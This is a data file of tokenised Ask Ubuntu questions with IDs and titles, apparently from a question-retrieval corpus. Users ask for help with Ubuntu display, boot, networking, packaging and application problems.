409622	font for keyboard layout	i want my keyboard layout as per anmol font . can you please advise me how to do that ?
409626	vpn connection not allowing me to connect to wireless network ( ubuntu 13.10 )	i setup a vpn connection in ubuntu 13.10 using justfreevpn.com , followed all their instructions and it works however i do n't seem to be able to connect to the wifi network i was using . what have i missed ?
409628	black logon screen until i logged in as a guest	ubuntu 12.04 , unity recently the logon screen had being screwed up . now booting ends up with black screen with blinking underscore character at the top left corner and normal mouse cursor . i 'm able to login as a guest by clicking mouse at the area where login accounts normally appear . in case i hit the guest account button guest desktop appears . then i click on `` log out '' menu item and it brings me right to normal logon screen , where i can choose my actual account and type in the password . how can i replace that black screen with normal logon screen ?
409629	ubuntu 12.04 64-bit xstart does not work , gui is lost	i have a big problem . because my pc does not start without a monitor , i tried the following : http : //ubuntuforums.org/showthread.php ? t=1452600 & page=7 > for ubuntu 11.10 the only thin which worked was 1 ) install dummy monitor by code : sudo apt-get install xserver-xorg-video-dummy 2 ) backup xorg.conf by code : sudo mv /etc/x11/xorg.conf /etc/x11/xorg.conf.bak 3 ) then create a new xorg.conf code : sudo gedit /etc/x11/xorg.conf with : code : section `` device '' identifier `` configured video device '' driver `` dummy '' endsection section `` monitor '' identifier `` configured monitor '' horizsync 31.5-48.5 vertrefresh 50-70 endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' defaultdepth 24 subsection `` display '' depth 24 modes `` 1024x800 '' endsubsection endsection ( seen on : http : //blog.mediafederation.com/andy ... a-800x600-fix/ ) after i did a reboot , my gui was gone ! only terminale is there , i can login with my name and password and i have access to the filesystem ! it seems like my xorg is deinstalled or something . the x file on /usr/bin is not available so xstart wont execute it ! i need the gui again guys ... can you please help me ? ? ? ? ? ? ? ? : ( edit : the only way i can get into the internet is via surfstick , because i am inside of a company ! mit friendly regards mt
409630	how can i get plugins for gedit for zooming the text file ?	i want the gedit plugin for zooming the text in file.when i clicked on the edit-preference-plugin it shows me below message , where i could n't find plugin .
409631	create a new pair of ssh key before deploy charm	our application requires each node in a cluster has the same pair of ssh keys . we provide the default one in the charm but it 'd better to generate new one before deploy . the same keys will be copied to all nodes ' ./ssh/ directory . for local charm that 's is no problem but handle this when user deploy from charm store . i know put the keys to config.yaml and let user deploy with -- config option will do it but probably is not preferred way .
409633	problem with intel drm in ubuntu 13.10	i do n't know what causes this , but since yesterday , my computer screen is all blank when i reboot . i could see the ubuntu boot screen , and a few seconds later my computer just goes blank . however , i 'm able to get my desktop back by switching between ctrl+alt+f1 and ctrl+alt+f7 . when i ran dmesg , i get this : [ 9749.649010 ] [ drm : intel_update_fbc ] , fbc set to per-chip default [ 9749.649025 ] [ drm : intel_update_fbc ] , fbc disabled per module param [ 9749.665710 ] [ drm : intel_update_fbc ] , fbc set to per-chip default [ 9749.665722 ] [ drm : intel_update_fbc ] , fbc disabled per module param [ 9749.815335 ] [ drm : intel_update_fbc ] , fbc set to per-chip default [ 9749.815354 ] [ drm : intel_update_fbc ] , fbc disabled per module param [ 9749.915133 ] [ drm : intel_update_fbc ] , fbc set to per-chip default [ 9749.915143 ] [ drm : intel_update_fbc ] , fbc disabled per module param [ 9750.081427 ] [ drm : intel_update_fbc ] , fbc set to per-chip default [ 9750.081441 ] [ drm : intel_update_fbc ] , fbc disabled per module param [ 9750.164649 ] [ drm : intel_update_fbc ] , fbc set to per-chip default [ 9750.164664 ] [ drm : intel_update_fbc ] , fbc disabled per module param i have no idea what 's going on . any assistance is appreciated .
409637	how do i deploy a local charm from the juju gui ?	is there a way to configure juju gui deploy local charm ? i install vagrant/virtualbox local provider but does n't see this feature either .
409638	how do i install the latest empathy 3.11+ in ubuntu	i was wondering if someone could give me brief answer regarding if this is possible or not . i have tried to follow these instructions i downloaded the latest source file , but i seem to have unmet dependencies : e : unable to locate package telepathy-butterfly e : unable to locate package libtelepathy-farsight0 e : unable to locate package python-tpfarsight can anyone help ? best regards
409643	audacious desktop notifications stopped working in 13.10	when running 13.04 , i used audacious as a music player , with the `` desktop notifications '' plugin set up to display the current track , album name , artist name and album art whenever the track changed . this would appear as a notification in the top-right , similar to if a command was sent using notify-send . since upgrading to 13.10 , though , the notifications have stopped using the notifier , and instead pop up with a grey box with the track details in the background as below . i do n't know what changed in between ubuntu versions ( this has been ever since i upgraded to 13.10 , never saw anything like it before ) . i 've tried playing around with the song change function , putting notify-send `` % t '' `` % a\n % b '' as the command to get the track details at least ( % t is the track title , % a is the artist and % b is the album title ) , but there does n't seem to be any way of displaying the album art at all ( the filepath to the album art is n't listed as a possible variable , only the path to the track -- and even though i have them all stored as /path/to/album/folder.jpg , using dirname to extract the folder and adding `` folder.jpg '' does n't seem to work . the command i 'm trying is notify-send `` % t '' `` % a\n % b '' -i `` $ ( dirname % f ) /folder.jpg '' , but this does n't work . if i do similar in a shell window , but explicitly put path/to/file.mp3 instead of % f it works - i assume this is because of how the % f variable is being expanded ; but no permutation of double and single quotes around various parts seems to work properly . is there any way of restoring the old behaviour , or getting the new command to work with finding the album art at least ? edit : from a little bit of testing , it seems that the notification box could be being generated by something along the lines of notify-send -t 0 - a zero timeout seems to send a box like this by default ( cf . https : //wiki.ubuntu.com/notifyosd # org.freedesktop.notifications.notify ) . i do n't really know why this would happen starting with 13.10 , but if anyone knows a way of taking this out of audacious ( short of changing source code and recompiling ) i 'd love to hear it ; or maybe this would belong better as a bug report ?
409650	i ca n't find the other hard drive in my computer	i recently installed ubuntu 13.10 in my windows 7 computer . my computer has 2 internal hard drives . after the installation , i ca n't find my 2nd hard drive . the only hard drive that shows up is the one that contains the ubuntu os . seems like the 2nd hard drive is not installed or whatsoever . i do n't know what to do . i 'm so frustrated . what should i do ?
409654	installing ubuntu ( black screen error when trying to use live usb )	i 've been trying to install ubuntu alongside windows 8 on my new laptop . i 've download the latest version of ubuntu ( 13 ) i then used this as a guide to help me . i did everything they said . when i got to running the usb as a live version instead of getting the picture they got , i got a black screen with 4 options : try ubuntu without installing ( this comes up with black screen ) install ubuntu ( ... black screen ... ) oem install ( for manufacturers , so i did n't try it ) check disks for defects ( black screen ) . how do i do this properly so i can install ubuntu alongside my win 8 ? thanks for you time . : )
409655	ubuntu 13.10 : bad application startup drawing ( e.g. , chromium )	i have always noticed a small graphical performance issue in my ten years experience with gnu/linux . the problem is related to how applications are drawn when started . typically , on my machine , when you start an application : step 1 : the window is drawn without any content ( e.g. , white inside or black inside , then it is expanded to fullscreen , then filled with some white inside ) step 2 : then the gui toolkit ( e.g. , gtk 2.x ) starts to include some graphical components step 3 : finally , the application is ready to be used i recorded two videos : the first one shows the startup of chromium , while the second one is related to nautilus ( i have killed nautilus before recording ) . i can notice the same problem with qt4/kde applications . i would like that steps 1 and 2 are executed in `` background '' and the application is shown only when the application content is fully drawn/ready ( step 3 ) . steps 1 , 2 , 3 typically happen in 0-2 seconds , therefore waiting for step 3 is not a huge problem ( imao ) . how can i fix this issue ? steps 1-2 are really annoying to be seen . my setup : ubuntu 13.10 amd64 unity/compiz ( default configuration , disabled animations and fade windows effects but they did not improve the situation when enabled ) nvidia 319.32 ( installed with proprietary driver wizard ) intel core 2 duo 2.0ghz , 4gb ram , nvidia geforce 9400m but i have seen this problem on many machines ( intel/amd/nvidia/open source drivers/closed drivers ) p.s . this is not a hardware issue ( my graphic card is not the best ) because other operating systems behave correctly .
409656	ubuntu missing in boot menu	i had installed windows 7 ultimate on my hard disk.then i installed ubuntu 12.04 lts using wubi . everything worked fine suddenly ubuntu disappeared from boot menu , only windows 7 is visible in boot menu
409658	can not run spark 2.6.3 on ubuntu 12.04	i am trying to install spark im in my fresh install of ubuntu 12.04 , however i am running into all kinds of problems . the steps i have taken so far were : download the tar.gz file from the website unpack it into my desktop sudo mv desktop/spark/ /opt/ then i try to run the file as root sudo sh /opt/spark/spark , but i get the following error : /opt/spark/spark : 150 : /opt/spark/spark : bin/unpack200 : not found error unpacking jar files . aborting . you might need administrative priviledges for this operation . since i was running the file as root ( using admin ) i do not understand why it says that `` might need '' administrative privileges ... here is the output of running ls -al : total 56 drwxr-xr-x 2 pedro pedro 4096 jul 1 2011 bin drwxr-xr-x 4 pedro pedro 4096 jul 1 2011 documentation drwxr-xr-x 2 pedro pedro 4096 jan 23 14:28 .install4j drwxr-xr-x 4 pedro pedro 4096 jul 1 2011 jre drwxr-xr-x 6 pedro pedro 4096 jul 1 2011 lib drwxr-xr-x 2 pedro pedro 4096 jul 1 2011 logs drwxr-xr-x 2 pedro pedro 4096 jul 1 2011 plugins drwxr-xr-x 3 pedro pedro 4096 jul 1 2011 resources -rwxr-xr-x 1 pedro pedro 8528 jul 1 2011 spark -rwxr-xr-x 1 pedro pedro 7520 jul 1 2011 starter drwxr-xr-x 3 pedro pedro 4096 jul 1 2011 xtra the file i am trying to run is a `` sh '' file , so i do not need to do sudo chmod +x spark right ? why is this not running ? what do i need to do to fix it ?
409660	dnscrypt-proxy works , but with incorrect permissions	i have successfully installed and find myself in the middle of configuring dnscrypt-proxy for use on ubuntu 13.10 x64 . however i am running into some issues with permissions in general . i have added a user with the following commmand : sudo adduser -- system -- quiet -- home /run/dnscrypt -- shell /bin/false -- group -- disabled-password -- disabled-login dnscrypt and issued dnscrypt-proxy -- daemonize -- user=dnscrypt but without success . so i tried just -- daemonize and finally just dnscrypt-proxy which resulted in a udp bind permission error . ran it as root and the error goes away . dnscrypt-proxy -- user=dnscrypt results in the error returning . i 'm guessing its failing because of some permission , but do n't have a clue where to start or what to change at this point . also i would like to run this at network startup or after login . which i think i can manage , but if you have a suggestion it would just save me time . i do n't understand why i ca n't run this as -- user=dnscrypt but root works fine . edit : just to clarify a little more , i 'm actually running elementary os luna 0.2 , which is based on ubuntu 13.10 ( i believe )
409661	how to create a tunneling connection for remote screen sharing	i have the following setup : my computer -- > isp router -- > internet -- > company isp router -- > company router -- > switch -- > company server . using teamviewer i can share the company server with my computer in 2 or 3 steps . that is , install teamviewer on both computers and simply input the id and password of the server in my computer . done . i wish to stop using teamviewer for several reasons and start using other vnc like options . the one i want to try is remmina . does remmina have the capability to remotely connect from my computer to the company server and if so how ? what are the steps needed to actual remotely connect ( including tunneling my way ) to the server , in the same fashion and ease of use as teamviewer . it might not be easy the first time because i would guess i would need to configure a couple of things first on both sides but the ideal situation is one where i could simply open remmina on the client side and connect directly to the server . if the remmina tool is not able to accomplish this , what other open source tools are available ( avoiding ones like teamviewer from the list ) . there are a couple of things i would like to avoid ( if possible ) : not modifying the router or any in the middle hardware . just the client and server pcs . not compiling anything that changes the ubuntu system . installing a package from apt / synaptic / software center should be enough .
409663	can not start webex session . java permission issue ?	my fingers got ahead of me today and i managed to disable java for webex on my machine . ( install details : ubuntu 12.04 32bit , chrome 32.0.1700.77 , java v7 , update 51 , webex working fine for a year till now . tried firefox with same result . ) i hurriedly clicked past a java dialog box similar to this one and checked the `` do not show this again ... '' box . note that this is not the exact dialog box , it was the most similar one i could find . i do n't remember the yellow box with `` this application will be blocked ... '' now when i start my meeting ... i wind up with just a blank webpage ... therefore i think ( not sure ) that i inadvertently disabled java needed for this app to run . can anybody tell me how to re-enable it ? i 've googled for half an hour and am coming up dry . java verified on the machine by java webpage : thanks in advance for any help !
409668	no boot option after dual boot windows 7 and ubuntu 13.10	i have been fighting with my pc to dual boot windows 7 and ubuntu 13.10 for the past few days . i think i finally cracked it today and i 'm fairly confident that everything is where it should be . however , i have one final hurdle to leap ... after finally installing ubuntu in its own partition i could n't log into it . there was no option to choose between the 2 os and instead windows just auto logged me in . so i ran boot repair from live ubuntu . now , i have the exact opposite problem ! i can see grub , it asks me to choose where to log in but the only option i have is ubuntu . if anyone has any ideas that would be great ... here is the link that boot repair gave me , i think the answer is in here in this boot-repair output but i do n't understand it all . thanks in advance . ps . i 'm loving ubuntu and i absolutely adore this forum !
409670	partitions not do delete when erasing windows	after using linux for a while i decided to get rid of win7 using brute-force . i choosed to simply erase the windows partitions . unfortunately i am a bit surprised by the amount of unknown partitions on my windows ssd drive ... i can identify the window boot , os , recovery and data . but i need help with the following partition : unknown datatype- 128 mib- flag : -- -msftres is this the machine-partition ( something i must absolutely not delete ) or some other windows variety ? oh and yes , i 've googled it , but being a newbie i did n't understand the answers at all , so thank you for bringing simple answers : )
409671	pidgin and gtalk ( online version ) do n't always synchronize	i use pidgin to chat with my ym and gtalk friends . usually , when i am signed into my gmail account and i 'm also connected to pidgin , i receive my messages in both my browser-integrated gtalk window and in my pidgin window in the same time . and when i reply , my answer appears in both places in the same time . but today , when i checked on my mail account i have noticed an offline message from one of my friends . the message was 4 dais old . the strange thing is that in all these days i did opened my pidgin app , so i should receive that offline message till now . strangely , i did n't . furthermore , when i checked my friend 's conversation log file in pidgin , there was no trace of his words ! so , the only logical conclusion is that , somehow , and for reasons that are beyond my understanding , my pidgin account did not `` pulled out '' the offline messages from gtalk . sort to speak , they did not synchronized . so , i imagine i 'm not the first person who encountered this problem . i would like to know what caused it , how an i prevent in the future and how can i keep the conversation synchronized and keep them safe ?
409672	only touchscreen on boot	sometimes when i boot up my lenovo thinkpad twist , only the touchscreen works . the keyboard will work until i log in , but then both the keyboard and touchpad ( and trackpoint ) stop working . only the touchscreen in recognized . edit : after i restart ubuntu , all input devices work , but if i boot from a shutdown , they do n't . i am currently running ubuntu 13.10 x64 . thank you for any help !
409673	ubuntu 13.10 + gnome 3.10 , some menu 's lack left padding	i just installed gnome 3.10 ( i know - it 's experimental ) and everything is working great except for some menu 's seem to lack any left padding , causing the text to kind of stick to the edge . anyone know of a solution to this issue ? i am using zukwito from the webupd8 repositories .
409674	quit from the middle of password setting process	i try to check whether my root has password or not . i run this command ; sudo passwd root later on it responses as ; enter new unix password : based on that response , i have an indication that my root has no password . therefore i want to quit from the command process . how can i do that , please ?
409677	hibernate and/or suspend breaks my computer	i have a problem with my ubuntu os that i 've been trying to solve for the past 2 weeks with no results . i 've probably put 14 hours into solving this problem . when i use the suspend option on my computer , it breaks the operating system . the os suspends as it normally should ( dark screen , blinking power light , etc . ) but it does not wake up properly . when i try to wake it up , the backlight turns on and the fan starts and everything but the screen is black . i 've tried different key combinations ( ctrl+alt+f2 for example ) , putting in usb drives , pressing the power button , but none of it will turn the screen bright . the screen stays frozen black and the computer is running as if it were awake ( fan whizzing and stuff ) . i am forced to hard restart the system every time i choose the suspend option . hibernate is similar . when i type sudo pm-hibernate the computer will go dark , but will not power down . if i move the mouse it will turn back on to a black screen with a blinking cursor . ctrl+alt+f2 will go to a terminal window , but upon typing anything in the terminal window will freeze . i 've tried a number of ideas including all of them here : ubuntu freezes/crash after wake when upgraded to 13.10 and here : http : //wafflesatnoon.com/2012/11/17/ubuntu-suspend-wont-wake-up-my-quest/ help ? ubuntu 13.10 on a hp pavilion g6-2235us trinity [ radeon hd 7520g ] video driver
409681	error when installing netbeans	i need setup netbeans on ubuntu 12.04 , but it got this error please help me . thanks everybody
409684	image or reset broken ssd	there is something very wrong with my 160g ssd . it shows up as a 8mb drive in fdisk : disk /dev/sda : 8 mb , 8388608 bytes 255 heads , 63 sectors/track , 1 cylinders , total 16384 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sda does n't contain a valid partition table pretty much everything on there is backed up , but i would like to create an image just to be on the save side . dd seems to only see the 8mb drive : dd if=/dev/sda of=/home/ubuntu/data/sda.img conv=sync , noerror bs=64k count=160g 128+0 records in 128+0 records out 8388608 bytes ( 8,4 mb ) copied , 0,20943 s , 40,1 mb/s how can i create an image of the full 160g drive and how do i fix the drive to use it again ? ps : i have read all sorts of wikis etc . ( https : //help.ubuntu.com/community/datarecovery ) but none of them seems to deal with the kind of issue i have here .
409692	dell latitude e6400 wireless not working on ubuntu 13	ubuntu will not let wireless work on my dell latitude e6400 ive tried some other thread on here adn that didnt work please help
409694	how to add f.lux to startup applications on lubuntu ?	i installed f.lux on lubuntu and want to add it to startup application . how can i find f.lux location at file system and add it to startup application ?
409697	latex/dvips font problem ubuntu 13.04	on ubuntu 13.04 , many of my dvips calls deliver error messages like , dvips : font helvetica used in file < ... > is not in the mapping file . all these calls work perfectly fine on ubuntu 12.10 which i 'm using in parallel on my laptop . gv can also display the 'missing ' fonts if called directly , so i guess they are installed correctly and it must be an issue with dvips in ubuntu 13.04 i 've installed texlive-fonts-recommended texlive-fonts-extra any ideas ?
409704	audio card in ubuntu 13.10 has lots of noise when a sound is being played	it 's not enjoyable to listen to music anymore , of course for me and everyone like me that has the same problem . when i play a music it has lots of noise , the real track has no problem though . this is the output of my sound info : cat /proc/asound/cards 0 [ intel ] : hda-intel - hda intel hda intel at 0xfe9f8000 irq 43 what should i do ? should i upgrade audio driver ? any help would be appreciated .
409705	gedit default file opening on sshfs files	when i open gedit , and start typing a path to a file i want to edit on a sshfs drive , if i 'm not fast enough in typing and pressing enter , gedit changes what i have typed , and automatically selects the most recently changed file in the working directory ( ie , whatever directory i 've last been using ) . sometimes i have typed a long path , and it can be quite frustrating to have to start all over again ... sometimes i press enter just a micro-second too late , and so i end up opening the wrong file . i think this is likely default behaviour of gedit , to select the most recently edited file -- but the delay in accessing remote file systems means that things i 've typed in the open edit-box are replaced .
409707	ubuntu 12.04 lts wo n't connect to the school 's wired network	my computer is connected to the school 's network via an ethernet cable , but ubuntu wo n't recognize the network . it will scan the network for about 30 seconds and then a small error window pops up saying `` network disconnected , you are now offline '' . i have been trying to fix the issue for almost 3 days now ; i even re-installed ubuntu from my bootable usb . this was a scratch install of ubuntu 12.04 lts via a bootable usb ( which was created on my macbook pro after i converted the .iso to a .img file ) on a new computer that i just recently built . i already contacted my school 's it department , and my mac address is registered with them . however , i am the only student running linux on the entire campus and they are unable to give me further support . i have researched the forums extensively and have tried various solutions , but none seem to work . i was advised by the it department to leave my internet connection for ipv4 on automatic dhcp , rather than setting it to manual and copying the information from my laptop . additionally i tried using a friends usb wireless adapter ( a netgear wireless n-300 ) , but ubuntu did n't recognize the device as a wireless adapter . as a result , wireless does not appear to be a viable backup solution . when my ipv4 is set to automatic ( as recommended by my it department ) my terminal ifconfig is eth0 link encamp : ethernet hwaddr 74 : d4:45:0d : bc : b5 inet6 addr : fe80:76d4:35ff : fe0d : bcb5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:389 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:47 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:39214 ( 39.2 kb ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu : 65536 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets 16 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:1312 ( 1.3 kb ) tx bytes : 1312 ( 1.3 kb ) when my ipv4 is set to manual and is copied from my macbook pro 's internet configuration , my ifconfig is : will @ anarch : ~ $ ifconfig eth0 link encap : ethernet hwaddr 74 : d4:35:0d : bc : b5 inet addr:138.234.212.246 bcast:138.234.223.255 mask:255.255.240.0 inet6 addr : fe80 : :76d4:35ff : fe0d : bcb5/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:22060 errors:0 dropped:0 overruns:0 frame:0 tx packets:7 errors:0 dropped:3371 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:2659497 ( 2.6 mb ) tx bytes:461 ( 461.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4597 errors:0 dropped:0 overruns:0 frame:0 tx packets:4597 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:404944 ( 404.9 kb ) tx bytes:404944 ( 404.9 kb ) as seen in the comments below this question , here are the results for the ipshow command when ipv4 is set to automatic : ip link show 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up qlen 1000 link/ether 74 : d4:35:0d : bc : b5 brd ff : ff : ff : ff : ff : ff here is my nm-tool for the automatic ipv4 setup : will @ anarch : ~ $ nm-tool networkmanager tool state : connecting - device : eth0 [ wired connection 2 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connecting ( getting ip configuration ) default : no hw address : 74 : d4:35:0d : bc : b5 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on here is my nm-tool for the manual ipv4 configuration : will @ anarch : ~ $ nm-tool networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : connected default : yes hw address : 74 : d4:35:0d : bc : b5 capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 138.234.212.246 prefix : 20 ( 255.255.240.0 ) gateway : 138.234.208.1 dns : 138.234.4.54 dns : 138.234.196.47 dns : 138.234.4.158 this is the ping to google 's server ( ip : 8.8.8.8 ) using manual network settings : will @ anarch : ~ $ ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 138.234.212.246 icmp_seq=1 destination host unreachable from 138.234.212.246 icmp_seq=2 destination host unreachable from 138.234.212.246 icmp_seq=3 destination host unreachable from 138.234.212.246 icmp_seq=4 destination host unreachable from 138.234.212.246 icmp_seq=5 destination host unreachable here is a short list of failed solutions that i have already tried from other forum posts : manually setting up my ipv4 based off of the information from my laptop 's ( a macbook pro ) network connections registering my mac address with the campus resetting the ethernet by turning the card off and on in the bios setup deleting and creating the network connection in the network connectionâs window using echo on | sudo tee /sys/class/net/eth0/device/power/control and other 's that i ca n't call to mind at the moment i 'm done with classes for the day , so if anyone needs any more information please let me know . i will continue to troubleshoot for the rest of the day , so any help is greatly appreciated . p.s . would it be advisable to try to install a different distro of linux and see if it can connect to the network ? thank you , william
409709	verifying deja dup backup on s3 fails	i 've installed the s3 plugin for deja dup and am using it to backup a fairly large amount of data . the backup seems to complete successfully but when deja dup tries to verify it i get an error . has anyone else ever seen this ? i 'd love to know if the backup is really succeeding before i get to a time when i actually need it ...
409711	how to find specific string or hex value under gdb	based on physical memory address where i 'm started draw from `` hexdump -c '' commands as below . 0040f4f0 53 48 45 4c 4c 43 4f 44 45 3d 54 68 69 73 20 6c |shellcode=this l| 0040f500 69 6e 65 20 69 73 20 74 65 73 74 0a 0d 00 54 45 |ine is test ... te| when i 've enter into core dump file by using `` adb -c core.2288 '' to find out those series of hex values as same from where i 've dump from above my question is possible that could i find a series of hex value started begin from `` \x69\x6e\x65\x20\x69\x73\x20 '' by utilising `` find /w '' commands or other alternative ways ? thansk advance for anyone could help my problems .
409712	installation of i386 deb ( hangul 2008 ) into amd64 architecture ; dpkg/library error	i 'm using chrubuntu 12.04 lts on acer chromebook c720 . as i 'm korean , i 'm trying to install 'hangul 2008 linux ' , korean style 'ms-word ' software made for linux users . becuase it is only for i386 architecture with .rpm file i needed to convert those files into .deb files using alien command . installing this on my ubuntu 12.04 32 bit in my virtualbox went smoothly linking some lib* files from /usr/bin to usr/bin/i386 ... . but installation of this on my chrubuntu 64bit architecture stalls with some dependency error messages for two deb files . as learned from other successor i ran 'apt-get install -f ' or installing unfound lib* files but there are no dependency errors nor all lib files are installed already . i think maybe the path those *.deb files point mismatches to where real lib files are in . please , can any one help me for installing this program ? errors i got user @ chrubuntu : /media/user/usb disk/debs43bit-noscritps $ sudo dpkg -- force-architecture -i haansoft-hwp7-plugin_7.5.6.482-4axdt3_i386.deb [ sudo ] password for user : dpkg : warning : overriding problem because -- force enabled : package architecture ( i386 ) does not match system ( amd64 ) ( reading database ... 196194 files and directories currently installed . ) preparing to replace haansoft-hwp7-plugin 7.5.6.482-4axdt3 ( using haansoft-hwp7-plugin_7.5.6.482-4axdt3_i386.deb ) ... unpacking replacement haansoft-hwp7-plugin ... dpkg : dependency problems prevent configuration of haansoft-hwp7-plugin : haansoft-hwp7-plugin depends on libatk1.0-0 ( > = 1.12.4 ) . haansoft-hwp7-plugin depends on libc6 ( > = 2.1.3 ) . haansoft-hwp7-plugin depends on libcairo2 ( > = 1.2.4 ) . haansoft-hwp7-plugin depends on libgcc1 ( > = 1:4.1.1 ) . haansoft-hwp7-plugin depends on libgdk-pixbuf2.0-0 ( > = 2.22.0 ) . haansoft-hwp7-plugin depends on libglib2.0-0 ( > = 2.12.0 ) . haansoft-hwp7-plugin depends on libgtk2.0-0 ( > = 2.8.0 ) . haansoft-hwp7-plugin depends on libpango1.0-0 ( > = 1.14.0 ) . haansoft-hwp7-plugin depends on libpng12-0 ( > = 1.2.13-4 ) . haansoft-hwp7-plugin depends on libstdc++6 ( > = 4.1.1 ) . dpkg : error processing haansoft-hwp7-plugin ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : haansoft-hwp7-plugin user @ chrubuntu : /media/user/usb disk/debs43bit-noscritps $ user @ chrubuntu : /media/user/usb disk/debs43bit-noscritps $ sudo dpkg -- force-architecture -i haansoft-common7-gst_7.5.6.536-5axdt3_i386.deb dpkg : warning : overriding problem because -- force enabled : package architecture ( i386 ) does not match system ( amd64 ) ( reading database ... 196194 files and directories currently installed . ) preparing to replace haansoft-common7-gst 7.5.6.536-5axdt3 ( using haansoft-common7-gst_7.5.6.536-5axdt3_i386.deb ) ... unpacking replacement haansoft-common7-gst ... dpkg : dependency problems prevent configuration of haansoft-common7-gst : haansoft-common7-gst depends on libc6 ( > = 2.3.6-6~ ) . haansoft-common7-gst depends on libgcc1 ( > = 1:4.1.1 ) . haansoft-common7-gst depends on libglib2.0-0 ( > = 2.12.0 ) . haansoft-common7-gst depends on libgstreamer0.10-0 ( > = 0.10.0 ) . haansoft-common7-gst depends on libxml2 ( > = 2.6.27 ) . dpkg : error processing haansoft-common7-gst ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : haansoft-common7-gst what i have done . root @ chrubuntu : /home/user # apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ chrubuntu : /home/user # apt-get install libc6 reading package lists ... done building dependency tree reading state information ... done libc6 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ chrubuntu : /home/user # apt-get install libgcc1 reading package lists ... done building dependency tree reading state information ... done libgcc1 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . root @ chrubuntu : /home/user #
409714	ubuntu for kindle fire hdx or hd	noob question : could i get ubuntu tablet to work on kindle fire hdx 7 inch without rooting ? could i run it side by side , kind of like how ubuntu for android works ? now , this question would be different from others because i would like to also know if it touch works on the kindle hd , would it also work on the hdx .
409729	disconnecting android phone	i have a weird problem . i can connect my android phone to my laptop , it keeps connecting/disconnecting ( about twice per second ) . i tried on another laptop with ubuntu installed , and it worked fine . big problem is that , aside of no file transfer , i ca n't charge my phone . i keep getting the message `` unable to open mtp device ' [ usb:003 , ] ' '' , where num keeps increasing ( i assume it is communication attempts ) . what may be causing this problem ? i have no idea where to start . it 's the only usb device that does that ( my ipod charges fine , and i can even access the music no problem ) . is there a way i can `` deaden '' one of the usb ports , such that only power is provided , but no data transfer attempts ? p.s . : my phone is a samsung galaxy s2 . p.p.s : it does that on all usb ports .
409731	how to install the drivers for wg311v3 card	while executing the modprobe command to install the drivers for wg311v3 card i get the following error . what is the fix for this ? sudo modprobe ndiswrapper < b > fatal : error inserting ndiswrapper ( /lib/modules/3.8.0-35-generic/updates/dkms/ndiswrapper.ko ) : invalid module format < /b > ndiswrapper -v utils version : '1.9 ' , utils version needed by module : '1.9' module details : filename : /lib/modules/3.8.0-35-generic/updates/dkms/ndiswrapper.ko version : 1.58 vermagic : 3.8.0-29-generic smp mod_unload modversions 686
409732	how to only install updates from a specific *file* repository ?	i created my own internal repository following the instructions here : how to make my own local repository ? i added the line deb file : /usr/local/mydebs/ ./ to my /etc/apt/sources.list how do i specify the -- target-release if my target release is just ./ ? for example if i added the line deb http : //mozilla.debian.net/ squeeze-backports iceweasel-release to my /etc/apt/sources.list i would specify it like this apt-get install -t squeeze-backports iceweasel how to only install updates from a specific repository ?
409735	unable to update from 12.04 to 12.10	i 'm trying to update from 12.04 to 13.04 but i firstly need to go thorugh 12.10 , using update manager . this is the error i get . e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ) please do n't mark this as `` duplicate '' , i have searched and found troubles like this but none seemed to work .
409736	httrack : how to copy a website with email based username login	i 'm trying to do an off-line copy a website that requires login with httrack . the question , although , it is quite more generic . following this instructions http : //www.httrack.com/html/faq.html # qm6 i understood that i must use the following structure to be logged-in : https : //username : password @ www.website.com the problem i 'm facing is probably very simple for someone with html expertise . how can i do to put a username that is actually an email address inside https : //username : password @ chain ? because as it is , when i put my username , the code is `` cut '' by the `` @ '' of the email , instead of considering the whole stuff . thanks in advance !
409740	disallow user access to microphone	blacklisting a kernel module would disable the microphone for all users . i have set up a restricted user , who should not be able to use the microphone . the restricted user should , however be able to have sound output . is there a way of reliably disabling the microphone for a restricted user ?
409743	icedove unread threaded message in top of list	in icedove we can sort mail by status ( read / unread ) and sort them by threads too . however , when a thread message is not read , icedove considers the date of the first message of the thread instead of the unread one . unread messages are bold , and for thread message , the first thread message is underlined . hence , the unread goes far far away from top list as the time goes . is this behavior logical and/or can we fix/hack it to display `` properly '' ( in my opinion ) the unread messages first ? thanks
